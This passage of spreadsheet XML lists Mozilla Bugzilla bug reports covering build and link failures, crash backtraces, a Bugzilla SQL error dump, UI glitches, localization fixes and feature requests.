  <si>
    <t>Created attachment 312872
list address
this is so much better:
JS API usage error: found live context at 00A8CF18
JS API usage error: 1 contexts left in runtime upon JS_DestroyRuntime.
JS engine warning: leaking GC root 'res-&gt;input' at 00A8CFD8
JS engine warning: 1 GC root remains after destroying the JSRuntime at 009B0398.
                   This root may point to freed memory. Objects reachable
                   through it have not been finalized.
than w/o that first line.</t>
  </si>
  <si>
    <t>CORE-500850</t>
  </si>
  <si>
    <t>Make inline style use wrapper cache and slimwrappers</t>
  </si>
  <si>
    <t>As the summary says: make inline style use wrapper cache and slimwrappers.  Should help scripts that do foo.style.top all the time...</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-475061</t>
  </si>
  <si>
    <t>Bugs Filed Today link on bugzilla.mozilla.org queries Mozilla Application Suite should be SeaMonkey</t>
  </si>
  <si>
    <t>The Bugs Filed Today link on bugzilla.mozilla.org still uses product=Mozilla+Application+Suite should be product=SeaMonkey.</t>
  </si>
  <si>
    <t>CORE-529764</t>
  </si>
  <si>
    <t>nsPresArena.cpp failed to compile on Solaris</t>
  </si>
  <si>
    <t>On Solaris mmap/munmap/madivise/mprotect is a little different.
They use (char *) instead of (void *).
Also I fixed the test to make sure scratch = *(volatile unsigned char *)opaddr is really reading.
Verified on x86/SPARC with make check for debug/optimized build.</t>
  </si>
  <si>
    <t>ginnchen+exoracle</t>
  </si>
  <si>
    <t>CORE-516237</t>
  </si>
  <si>
    <t>nsTreeSelection::SetTree doesn't addref the tree</t>
  </si>
  <si>
    <t>This needs a testcase but it seems that nsITreeSelection::tree handling
is wrong. The interface is scriptable so a script may set the .tree.
nsTreeSelection then later uses that object but nothing guarantees that
the object is alive.</t>
  </si>
  <si>
    <t>FIREFOX-478097</t>
  </si>
  <si>
    <t>Make location bar autocomplete faster</t>
  </si>
  <si>
    <t>we can do better.  let's do it.</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-426223</t>
  </si>
  <si>
    <t>RSS preview only shows the first Media RSS object</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9b4) Gecko/2008030317 Firefox/3.0b4
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9b4) Gecko/2008030317 Firefox/3.0b4
If the media has multiple media objects only the first is shown (despite the heading Media Files):
			wattsupwiththat
			hp_filter_equation.png
Reproducible: Always
Steps to Reproduce:
1.  See details.
Expected Results:  
I expected to see all media objects for each item just not the first one.</t>
  </si>
  <si>
    <t>will.guaraldi</t>
  </si>
  <si>
    <t>EpsilonPrime</t>
  </si>
  <si>
    <t>CORE-463046</t>
  </si>
  <si>
    <t>Network connectivity checking breaks running netwerk unit tests and mochitests with no connection</t>
  </si>
  <si>
    <t>During time spent on flights recently I did most of the hacking to create the patch in bug 462864.  Naturally I didn't have a net connection.  When I went to find the first obvious bugs in the patch by running just the httpd.js tests in netwerk/test/httpserver/test I discovered after gdbing that netwerk was trying to be smart determining at startup that no net connection was present and shutting down the socket transport service.  With that shut down the asyncListen method on server sockets used in the HTTP server would throw an exception and the tests would fail.
This isn't exactly a common scenario but is there some way to make netwerk not try to be too smart here?  This change means anyone hacking offline on a Mac and trying to run tests on patches is in for a rude surprise even though all of it would work perfectly fine if it were allowed to do so.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-751632</t>
  </si>
  <si>
    <t>[NativeUI GA] Implement new mobile/platforms design</t>
  </si>
  <si>
    <t>Placeholder for implementation. 
Redesigning mobile/platforms to be responsive and to update with new minimum system requirements. Will need this updated before the native UI GA launch in late Q2.</t>
  </si>
  <si>
    <t>jfu</t>
  </si>
  <si>
    <t>CORE-219819</t>
  </si>
  <si>
    <t>.nodeValue shouldn't throw NO_MODIFICATION_ALLOWED_ERR for documents and elements</t>
  </si>
  <si>
    <t>CALENDAR-291721</t>
  </si>
  <si>
    <t>add ClassInfo to item and other interfaces</t>
  </si>
  <si>
    <t>To avoid QueryInterface() lameness implement CI so that interface flattening
can happen in JS.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-439722</t>
  </si>
  <si>
    <t>Make the bad cert error dialog more helpful</t>
  </si>
  <si>
    <t>The bad cert error dialog is currently not allowing to display the cert and it provides less information than the error page in firefox.
I have a patch to improve that a bit.
(This also prepares for further additions to the dialog should we ever consider to add a way to add exceptions from here... Which seems unlikely right now...)</t>
  </si>
  <si>
    <t>NSS-94355</t>
  </si>
  <si>
    <t>Test</t>
  </si>
  <si>
    <t>QA should test FIPS</t>
  </si>
  <si>
    <t>QA should test NSS in FIPS mode.  This needs to be done for 3.2.2.  patch
forthcoming.</t>
  </si>
  <si>
    <t>sonja.mirtitsch</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-219282</t>
  </si>
  <si>
    <t>Networking: POP</t>
  </si>
  <si>
    <t>add support for CAPA command</t>
  </si>
  <si>
    <t>We should add support for CAPA command to be able to handle the additional
response codes defined in RFC 2449 and 3206 correctly (and other capabilities of
course too).</t>
  </si>
  <si>
    <t>ch.ey</t>
  </si>
  <si>
    <t>CORE-383216</t>
  </si>
  <si>
    <t>1.8.1 branch on Linux crashes when loading wikipedia</t>
  </si>
  <si>
    <t>This doesn't happen on either trunk or 1.8.0 branch.
STEPS TO REPRODUCE:
1)  Get a 1.8.1 branch build
2)  Load http://www.wikipedia.org/
EXPECTED RESULTS:  No crash.
ACTUAL RESULTS:
Program received signal SIGSEGV Segmentation fault.
(gdb) frame
#0  0xb566f129 in nsFontMetricsGTK::LocateFont (this=0x89d01f0 aChar=66354 
    aCount=@0xbfff8204) at ../../../../mozilla/gfx/src/gtk/nsFontMetricsGTK.cpp:2058
2058        if (CCMAP_HAS_CHAR_EXT(font-&gt;mCCMap aChar))
(gdb) p font-&gt;mCCMap
$1 = (PRUint16 *) 0xb5697960
(gdb) p aChar
$2 = 66354
(gdb) p *font
$3 = (nsFontGTKSubstitute) { = {_vptr.nsFontGTK = 0xb56999c8 
    mCCMap = 0xb5697960 mCharSetInfo = 0x0 mName = 0x0 mUserDefinedFont = 0x0 
    mSize = 0 mAABaseSize = 0 mBaselineAdjust = 0 mMaxAscent = 0 mMaxDescent = 0 
    mFont = 0x0 mFontHolder = 0x0 mXFont = 0x0 mAlreadyCalledLoadFont = 0} 
  mSubstituteFont = 0x87fcfa0}
(gdb) p *font-&gt;mSubstituteFont 
$5 = (nsFontGTKNormal) { = {_vptr.nsFontGTK = 0xb5699a08 mCCMap = 0x842f50c 
    mCharSetInfo = 0xb5697ae0 
    mName = 0x87fcf58 -adobe-helvetica-medium-r-normal--12-120-75-75-p-*-iso8859-1 
    mUserDefinedFont = 0x0 mSize = 12 mAABaseSize = 0 mBaselineAdjust = 0 
    mMaxAscent = 11 mMaxDescent = 3 mFont = 0x87fbaf0 mFontHolder = 0x0 
    mXFont = 0x87e5f58 mAlreadyCalledLoadFont = 1} }
Not sure what other info you want but let me know if you need something.</t>
  </si>
  <si>
    <t>CORE-99797</t>
  </si>
  <si>
    <t>style.color parses too much (DHTML optimisation)</t>
  </si>
  <si>
    <t>To set a property at the moment we parse way more than we need to (just follow
the code path from |style.border| -- we first create a full declaration then parse
it looking for which property it is whether it is !important etc). We should
just expose a wrapper for CSSParserImpl::ParseProperty and call that directly.</t>
  </si>
  <si>
    <t>BUGZILLA-347777</t>
  </si>
  <si>
    <t>Intel Mac should be detected as Hardware: PC rather than Hardware: Mac</t>
  </si>
  <si>
    <t>Assuming that we've decided that Platform/Hardware really means CPU Architecture or similar the Intel Macs should be detected as PC:Macintosh rather than Macintosh:Macintosh. 
Alternately we could just convert the existing label to Mac-PPC and add a new item for Intel-Mac but we'd still have to update the detection logic to do the right thing. 
This is getting increasingly more important for bmo as more and more bugs are turning out to be PPC or Intel Mac specific.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-173645</t>
  </si>
  <si>
    <t>In-Reply-To: header contains wrong message-id</t>
  </si>
  <si>
    <t xml:space="preserve">User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.2b) Gecko/20021007
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.2b) Gecko/20021007
By bug 78117 fix a replying mail has In-Reply-To: header.
In-Reply-To: should indicate a mail message-id that I'll 
reply to.
But Mozilla let the mail have a oldest message-id in 
References: header.
Reproducible: Always
Steps to Reproduce:
1. reply to a mail with two or more References:.
ex. a mail has headers:
  Message-ID: 
  References:  
  In-Reply-To: 
2. view the sent mail's all header.
Actual Results:  
The mail have a oldest message-id in References: header.
ex. 
  Message-ID: 
  References:   
  In-Reply-To: 
Expected Results:  
In-Reply-To: should have a message-id that reply to.
ex. 
  Message-ID: 
  References:   
  In-Reply-To: </t>
  </si>
  <si>
    <t>mutot5-oslcax</t>
  </si>
  <si>
    <t>CORE-348999</t>
  </si>
  <si>
    <t>deadcode in nsCSSFrameConstructor::ConstructMathMLFrame isReplaced will not be true</t>
  </si>
  <si>
    <t>SEAMONKEY-464674</t>
  </si>
  <si>
    <t>Linux static build link failure in suite/app due to DBus</t>
  </si>
  <si>
    <t>c++ -o seamonkey-bin  -fno-rtti -fno-exceptions -Wall -Wpointer-arith -Woverloaded-virtual -Wsynth -Wno-ctor-dtor-privacy -Wno-non-virtual-dtor -Wcast-align -Wno-invalid-offsetof -Wno-long-long -pedantic -march=pentium4 -mtune=nocona -msse2 -msse3 -mssse3 -mfpmath=sse -fno-strict-aliasing -fshort-wchar -pthread -pipe  -DNDEBUG -DTRIMMED -Os -freorder-blocks -fno-reorder-functions   nsSuiteApp.o nsStaticComponents.o    -lpthread   -Wl-rpath-link../../mozilla/dist/bin:/usr/lib:/usr/local/lib:/lib  -L../../mozilla/dist/bin -L../../mozilla/dist/lib ../../mozilla/toolkit/xre/libxulapp_s.a -L../../staticlib -L../../mozilla/dist/bin -lmozjs  -L../../mozilla/dist/bin -lxpcom -lxpcom_core  `../../mozilla/nsprpub/config/nspr-config --prefix=../../mozilla/dist --libdir=../../mozilla/dist/lib --libs` -lgtk-x11-2.0 -latk-1.0 -lgio-2.0 -lpangoft2-1.0 -lfreetype -lz -lfontconfig -lgdk-x11-2.0 -lgdk_pixbuf-2.0 -lpangocairo-1.0 -lpango-1.0 -lcairo -lgmodule-2.0 -lgobject-2.0 -lglib-2.0      -lX11  -Wl--whole-archive -ljemalloc -Wl--no-whole-archive -ldl -lm  ../../mozilla/staticlib/components/libpref.a ../../mozilla/staticlib/components/libuconv.a ../../mozilla/staticlib/components/libucvmath.a ../../mozilla/staticlib/components/libi18n.a ../../mozilla/staticlib/components/libnecko.a ../../mozilla/staticlib/components/libauth.a ../../mozilla/staticlib/components/libxpconnect.a ../../mozilla/staticlib/components/libchardet.a ../../mozilla/staticlib/components/libzipwriter.a ../../mozilla/staticlib/components/libmork.a ../../mozilla/staticlib/components/libcookie.a ../../mozilla/staticlib/components/libpermissions.a ../../mozilla/staticlib/components/libstoragecomps.a ../../mozilla/staticlib/components/librdf.a ../../mozilla/staticlib/components/libcaps.a ../../mozilla/staticlib/components/libhtmlpars.a ../../mozilla/staticlib/components/libgkgfxthebes.a ../../mozilla/staticlib/components/libimglib2.a ../../mozilla/staticlib/components/libgkplugin.a ../../mozilla/staticlib/components/libwidget_gtk2.a ../../mozilla/staticlib/components/libtxmgr.a ../../mozilla/staticlib/components/libcomposer.a ../../mozilla/staticlib/components/libgklayout.a ../../mozilla/staticlib/components/libdocshell.a ../../mozilla/staticlib/components/libembedcomponents.a ../../mozilla/staticlib/components/libwebbrwsr.a ../../mozilla/staticlib/components/libnsappshell.a ../../mozilla/staticlib/components/libuniversalchardet.a ../../mozilla/staticlib/components/liboji.a ../../mozilla/staticlib/components/libaccessibility.a ../../mozilla/staticlib/components/libchrome.a ../../mozilla/staticlib/components/libmozfind.a ../../mozilla/staticlib/components/libintlapp.a ../../mozilla/staticlib/components/libwindowds.a ../../mozilla/staticlib/components/libxpautocomplete.a ../../mozilla/staticlib/components/libappcomps.a ../../mozilla/staticlib/components/libremoteservice.a ../../mozilla/staticlib/components/libplaces.a ../../mozilla/staticlib/components/libfileview.a ../../mozilla/staticlib/components/libtkautocomplete.a ../../mozilla/staticlib/components/libsatchel.a ../../mozilla/staticlib/components/libcommandlines.a ../../mozilla/staticlib/components/libtoolkitcomps.a ../../mozilla/staticlib/components/libspellchecker.a ../../mozilla/staticlib/components/libunixproxy.a ../../mozilla/staticlib/components/libpipboot.a ../../mozilla/staticlib/components/libpipnss.a ../../mozilla/staticlib/components/libpippki.a ../../mozilla/staticlib/components/libautoconfig.a ../../mozilla/staticlib/components/libsystem-pref.a ../../mozilla/staticlib/components/libwallet.a ../../mozilla/staticlib/components/libwalletviewers.a ../../mozilla/staticlib/components/libmozldap.a ../../mozilla/staticlib/components/libimport.a ../../mozilla/staticlib/components/libmsgsmime.a ../../mozilla/staticlib/components/libmail.a ../../mozilla/staticlib/libmozreg_s.a ../../mozilla/staticlib/libunicharutil_s.a ../../mozilla/staticlib/libucvutil_s.a ../../mozilla/staticlib/libgtkxtbin.a ../../mozilla/staticlib/libmorkreader_s.a ../../mozilla/staticlib/libthebes.a ../../mozilla/staticlib/libgfxshared_s.a ../../mozilla/staticlib/libgfxpsshar.a ../../mozilla/staticlib/libgkgfx.a ../../mozilla/staticlib/libjsj.a ../../mozilla/staticlib/libmimecthglue_s.a  -L../../mozilla/modules/libimg/png -lmozpng -L../../mozilla/jpeg -lmozjpeg -L../../mozilla/modules/zlib/src -lmozz -L../../mozilla/dist/bin -lmozlcms  -L../../mozilla/dist/bin -L../../mozilla/dist/lib -lcrmf -lsmime3 -lssl3 -lnss3 -lnssutil3 -lsoftokn3  -L../../mozilla/dist/bin -L../../mozilla/dist/lib -lldap60 -lprldap60 -lldif60  ../../mozilla/gfx/cairo/cairo/src/libmozcairo.a ../../mozilla/gfx/cairo/libpixman/src/libmozlibpixman.a   -lXrender -lfreetype -lfontconfig  -lXt -lgthread-2.0 -lpangoft2-1.0 -lpango-1.0 -lfreetype -lz -lfontconfig -lgobject-2.0 -lgmodule-2.0 -lglib-2.0   -L../../mozilla/dist/lib -lsqlite3
../../mozilla/staticlib/components/libdocshell.a(nsDBusHandlerApp.o): In function `nsDBusHandlerApp::LaunchWithURI(nsIURI* nsIInterfaceRequestor*)':
nsDBusHandlerApp.cpp:(.text+0x251): undefined reference to `dbus_error_init'
nsDBusHandlerApp.cpp:(.text+0x25b): undefined reference to `dbus_bus_get'
nsDBusHandlerApp.cpp:(.text+0x265): undefined reference to `dbus_error_is_set'
nsDBusHandlerApp.cpp:(.text+0x282): undefined reference to `dbus_connection_set_exit_on_disconnect'
nsDBusHandlerApp.cpp:(.text+0x296): undefined reference to `dbus_message_new_method_call'
nsDBusHandlerApp.cpp:(.text+0x2a9): undefined reference to `dbus_message_set_no_reply'
nsDBusHandlerApp.cpp:(.text+0x2b5): undefined reference to `dbus_message_iter_init_append'
nsDBusHandlerApp.cpp:(.text+0x2c4): undefined reference to `dbus_message_iter_append_basic'
nsDBusHandlerApp.cpp:(.text+0x2d0): undefined reference to `dbus_connection_send'
nsDBusHandlerApp.cpp:(.text+0x2e0): undefined reference to `dbus_message_unref'
nsDBusHandlerApp.cpp:(.text+0x30d): undefined reference to `dbus_error_free'
nsDBusHandlerApp.cpp:(.text+0x318): undefined reference to `dbus_connection_flush'
nsDBusHandlerApp.cpp:(.text+0x320): undefined reference to `dbus_message_unref'
collect2: ld returned 1 exit status
gmake[5]: *** [seamonkey-bin] Error 1
gmake[5]: Leaving directory `/mnt/mozilla/build/seamonkey-test/suite/app'
gmake[4]: *** [libs] Error 2
gmake[4]: Leaving directory `/mnt/mozilla/build/seamonkey-test/suite'
gmake[3]: *** [libs_tier_app] Error 2
gmake[3]: Leaving directory `/mnt/mozilla/build/seamonkey-test'
gmake[2]: *** [tier_app] Error 2
gmake[2]: Leaving directory `/mnt/mozilla/build/seamonkey-test'
gmake[1]: *** [default] Error 2
gmake[1]: Leaving directory `/mnt/mozilla/build/seamonkey-test'
gmake: *** [build] Error 2
This happens with current trunk and the following significant mozconfig options:
ac_add_options --disable-tests
ac_add_options --disable-debug
ac_add_options --enable-optimize
ac_add_options --disable-shared
ac_add_options --enable-static
--disable-tests is needed or some cairo tests fail to compile btw.</t>
  </si>
  <si>
    <t>CORE-325404</t>
  </si>
  <si>
    <t>Get rid of _base_href and _base_target attributes</t>
  </si>
  <si>
    <t>We should use properties rather then attributes for this. Patch coming up.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-322841</t>
  </si>
  <si>
    <t>need webalizer or similar for firefoxflicks.com</t>
  </si>
  <si>
    <t>We need to be able to measure traffic referrers search terms all the stuff that a webalizer report offers at FirefoxFlicks.com.</t>
  </si>
  <si>
    <t>CORE-339553</t>
  </si>
  <si>
    <t xml:space="preserve">drawString enhancement for </t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
As the canvas tag is not a standard anyway may I suggest the addition of a drawString method with parameters for font type size and string. 
In order to achieve usability canvas really requires an equivalent prototype method however the established prototype functions take immense amounts of clocktime and significantly (and unnessessarily) slow down the canvas. The current lack of standard in canvas makes it possible to include a drawString method before it is too late thus adding new possibilities to the object.
Reproducible: Always</t>
  </si>
  <si>
    <t>BUGZILLA-282737</t>
  </si>
  <si>
    <t>Software Error from time-tracking fields during Change Columns</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.0 .NET CLR 1.1.4322)
Build Identifier: Bugzilla 2.18
I did a query I went to change columns I removed the time tracking columns 
and bam I got a software error.
Reproducible: Always
Steps to Reproduce:
1. Run a query with columns Orig Est Time &amp; percent complete turned on
2. Press change columns
3. turn off orig est and percent complete
4. press change columns
5. BAM! death.
Actual Results:  
BAM! death.
Software error:
DBD::mysql::st execute failed: You have an error in your SQL syntax.  Check the 
manual that corresponds to your MySQL server version for the right syntax to 
use near '.bug_idSUMldtime.work_timeCOUNTDISTINCTldtime.bug_whenCOUNTbugs [for 
Statement SELECT bugs.bug_id bugs.bug_severity bugs.priority 
bugs.bug_status bugs.resolution bugs.bug_severity bugs.priority 
bugs.rep_platform map_assigned_to.realname bugs.bug_status bugs.resolution 
bugs.short_desc bugs.estimated_time 
100SUMldtime.work_timeCOUNTDISTINCTldtime.bug_whenCOUNTbugs.bug_idSUMldtime.work
_timeCOUNTDISTINCTldtime.bug_whenCOUNTbugs.bug_idbugs.remaining_timeASpercentage
_complete FROM bugs profiles AS map_assigned_to  LEFT JOIN bug_group_map  ON 
bug_group_map.bug_id = bugs.bug_id  AND bug_group_map.group_id NOT IN 
(12384131691125107)  LEFT JOIN cc ON cc.bug_id = bugs.bug_id AND 
cc.who = 1 WHERE bugs.assigned_to = map_assigned_to.userid AND (bugs.bug_id IN 
('1304''1001''1155''920''1037''1083''1161''1165''1169''1172''1295''13
11''855''1101''1250''940''1303''514''1282''1305''1306''1087''438''64
4''799''800''1128''1207''1237''416''1249''452''801''1064''413''446'
'1199''867''872''1071''1012''1171''913')) AND ((bug_group_map.group_id IS 
NULL)    OR (bugs.reporter_accessible = 1 AND bugs.reporter = 1)     OR 
(bugs.cclist_accessible = 1 AND cc.who IS NOT NULL)     OR (bugs.assigned_to = 
1) ) GROUP BY bugs.bug_id ORDER BY 
bugs.resolutionmap_assigned_to.realnamebugs.estimated_timemap_assigned_to.rea
lnamebugs.resolutionmap_assigned_to.realnamebugs.bug_statuspercentage_comple
tebugs.resolutionmap_assigned_to.realnamebugs.resolutionbugs.estimated_time
map_assigned_to.realnamebugs.resolutionbugs.estimated_timebugs.resolutionmap
_assigned_to.realnamebugs.estimated_timemap_assigned_to.realnamebugs.bug_seve
ritybugs.prioritybugs.bug_severitybugs.bug_id ] at Bugzilla/DB.pm line 62
	Bugzilla::DB::SendSQL('SELECT bugs.bug_id bugs.bug_severity 
bugs.priority bugs.bu...') called at /var/www/html/bugzilla/buglist.cgi line 
766
For help please send mail to the webmaster (xxx@ppg.com) giving this error 
message and the time and date of the error. 
Expected Results:  
No death.
I havn't tried this a lot but it seems that I cannot pass by it now.</t>
  </si>
  <si>
    <t>pjdemarco</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-283372</t>
  </si>
  <si>
    <t>training.dat not created or updated with many accounts</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b) Gecko/20050218 Firefox/1.0+
Build Identifier: version 1.0+ (20050223)
training.dat isn't being created or updated in my main profile. I fully
recreated it from scratch copying only the mailboxes and .mfs files but it
still fails. There are 2 POP3S 2 POP 1 IMAPS 5 NNTP and 1 RSS accounts
configured.
If I create a test profile with just one account training.dat is created
properly. Woo hoo :(
Reproducible: Always
Steps to Reproduce:
0. delete training.dat if you fancy
1. start get some mail
2. mark some spam and ham
3. exit
Actual Results:  
observe that training.dat is not present/updated in profile
Expected Results:  
training.dat should be present/updated in profile</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-244930</t>
  </si>
  <si>
    <t>warp2search.net - Right-clicking on a link automatically opens it in a new tab</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.2 en-US rv:1.6) Gecko/20040206 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.2 en-US rv:1.6) Gecko/20040206 Firefox/0.8
Right-clicking on a link automatically opens it in a new tab instead of opening
the usual context menu. It was ok on other browsers.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>arvant</t>
  </si>
  <si>
    <t>CORE-83496</t>
  </si>
  <si>
    <t>User events and focus handling</t>
  </si>
  <si>
    <t>Need mechanism that allows us to figure out how focus was gained</t>
  </si>
  <si>
    <t>This is an offshoot of bug #28583.
Right now there is no way for text widgets to tell if focus was gained as the 
result of the user tabbing between form widgets or by any other means.
We need a mechanism in the event system that allows the textwidget to tell 
how/why it got focus. This is neccessary because on some platforms tabbing into 
a textwidget is supposed to select all it's contents and any other method of 
focus gain leaves the selection/caret in the textwidget where it was before.</t>
  </si>
  <si>
    <t>NSS-204839</t>
  </si>
  <si>
    <t>Add TDC OCES CA certificate to builtin certificates</t>
  </si>
  <si>
    <t>TDC is the largest danish ISP. They are also providing free Certificates to all danish citizens. it would be sooo cool if their root CA certificat was installed in Mozilla as default.</t>
  </si>
  <si>
    <t>hecker</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-422235</t>
  </si>
  <si>
    <t>enable fast-patcher mode for release automation</t>
  </si>
  <si>
    <t>Patcher is able to hand off partial patch generation to make_incremental_updates.py (see bug 391958) which is much faster.
Let's enable this for release automation.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-268419</t>
  </si>
  <si>
    <t>changing urls to mozilla conform urls</t>
  </si>
  <si>
    <t>Change Throbber url to mozilla-europe's central and searchplugin url to the
en-US equivalent.</t>
  </si>
  <si>
    <t>a.topal</t>
  </si>
  <si>
    <t>CORE-56353</t>
  </si>
  <si>
    <t>Inheritance in XBL broken when element is out of flow</t>
  </si>
  <si>
    <t>Say your document tree looks like this:
   DIV
    |
   SPAN
Now bind SPAN so that a P is inserted between the DIV and the SPAN making the
frame model look like this:
   DIV
    |
    P
    |
   SPAN
Now float the span. Styles inherit from the DIV straight into the SPAN instead
of using the 'transformed' document model.
See the testcase:
   http://www.hixie.ch/tests/adhoc/xbl/007.html
In the testcase the P is given a border-color of green and the DIV is given
a border-color of red. The SPAN is then set to a solid border and told to 
inherit its border-color. The calculated border-color is red. This is wrong
since the closest parent of the SPAN is the P with the green border-color.
The same problem probably also occurs with other CSS properties that take an
element out of flow for instance positioning.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-410554</t>
  </si>
  <si>
    <t xml:space="preserve">SVN Account Request - Irina Sandu </t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 ro rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Build Identifier: 
Hello
I've been translating the Mozilla website for a long time and I need the account in order to be able to submit the changes myself. 
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>irinamimoza</t>
  </si>
  <si>
    <t>CALENDAR-188528</t>
  </si>
  <si>
    <t>password not hidden in Publishing prefs</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.3b) Gecko/20030110
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.3b) Gecko/20030110
In the Publishing preferences the password for the WebDAV server appears
in a regular textbox instead of a password textbox.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>spenot</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-454256</t>
  </si>
  <si>
    <t>--enable-static firefox builds should error in configure</t>
  </si>
  <si>
    <t>We don't actively support this configuration and I think it's broken currently anyway. We should save people from themselves and just make this an error in configure.</t>
  </si>
  <si>
    <t>SEAMONKEY-315207</t>
  </si>
  <si>
    <t>Show tab preview in tab tooltips</t>
  </si>
  <si>
    <t>See http://ted.mielczarek.org/code/mozilla/tabpreview/
When hovering over a tab the tooltip should show a preview of the tab's contents.</t>
  </si>
  <si>
    <t>CORE-115128</t>
  </si>
  <si>
    <t>not a file URL assertion when trying to get MIME type</t>
  </si>
  <si>
    <t>###!!! ASSERTION: not a file URL: 'Error' file nsStandardURL.cpp line 1615
Offending code is here:
http://lxr.mozilla.org/mozilla/source/netwerk/mime/src/nsMIMEService.cpp#134
and the error happens because we try to get an nsIFile from a http:// URL.
Fix will be to check the scheme.</t>
  </si>
  <si>
    <t>SEAMONKEY-244221</t>
  </si>
  <si>
    <t>OS/2 installer removes old WPS folder</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040514
Build Identifier: 
The installer for Mozilla 1.7RC2 removes the old WPS folder rather than
updating the existing one.  That means that any user additions or customizations
get destroyed.  The installer previously would update the existing WPS folder
and that is the desirable behavior.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>stevew</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-456450</t>
  </si>
  <si>
    <t>create mailing list thunderbird-testers</t>
  </si>
  <si>
    <t>please create mailing list thunderbird-testers for announcements with myself and dmose as administrators and no associated newsgroup.  This is to be open to the public. Does that mean lists.mozilla.org is the logical location? And this is to be an announcement only mailing list - normal subscribers are not able to post. So you'll need to point me to documentation on how I set who is allowed to post.
Thanks</t>
  </si>
  <si>
    <t>TOOLKIT-402333</t>
  </si>
  <si>
    <t>menu looks strange - highlight visible below menubar</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a9pre) Gecko/2007110212 Minefield/3.0a9pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a9pre) Gecko/2007110212 Minefield/3.0a9pre
The menu hightlight is visible below the menubar
Reproducible: Always
Steps to Reproduce:
1. Open Popup with visible menubar and locationbar use url for example see screenshot how it should look like
2. Move mouse over menu
Actual Results:  
Blue line below menubar
Expected Results:  
Should look normal
The activity indicator (this circle-thing on the right) is visible below the menubar too</t>
  </si>
  <si>
    <t>jonathan_haas</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-498753</t>
  </si>
  <si>
    <t>[mk] Check for updates dialog broken</t>
  </si>
  <si>
    <t>There is an XML parsing error in the Check for updates dialog in the Macedonian 3.5 localization.
Damian reported that in the newsgroup that's worth filing a bug.
The culprit are two refences to  in updates.dtd.
I'm going to land a bustage fix right now as we're respinning anyway.
I did a grep on my local clone that's the only occurance I found for BrandShortName.</t>
  </si>
  <si>
    <t>TESTING-708023</t>
  </si>
  <si>
    <t>Talos</t>
  </si>
  <si>
    <t>Getting application.ini in remote talos doesn't really work</t>
  </si>
  <si>
    <t>Talos has a bunch of code to get the application.ini from the remote device. This doesn't actually work in most cases because the SUTAgent process is running with a different id than fennec so doesn't have permission to get the file. The solution we have in automation is to manually copy the file from the Android .apk into the talos directory. This is fine but the workaround is confusing when just trying to set up talos for development. The silly thing is we don't even need the information in application.ini (build id appname etc.) -- it's only used when we upload information to the graphserver.
I thus propose the following solution:
1. Remove all code to get application.ini from the remote device.
2. In --develop mode don't even bother looking for or using the info in application.ini. 
3. In production mode demand that an application.ini file be present in the local talos directory. If it's not there error out with a verbose error message like application.ini not found. Please extract and copy from your Fennec apk.</t>
  </si>
  <si>
    <t>wlachance</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-347097</t>
  </si>
  <si>
    <t>Microsummaries</t>
  </si>
  <si>
    <t>establish optimum microsummary load timeout</t>
  </si>
  <si>
    <t>We now cancel microsummary loads after 10 seconds.  It occurs to me after seeing mconnor using Dietrich's cool new Bugzilla bug list microsummary that some legitimate microsummary loads could take a lot longer than that.  Bug lists in particular can occasionally take minutes to complete and they regularly take more than 10 seconds.
We should figure out what the optimum load timeout is so that we don't leave dangling connections but also handle the vast majority of loads.  cc:ing darin for insight into this issue.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-497228</t>
  </si>
  <si>
    <t>Create SQL migration script for database</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.11) Gecko/2009051908 Firefox/3.0.11
Build Identifier: 
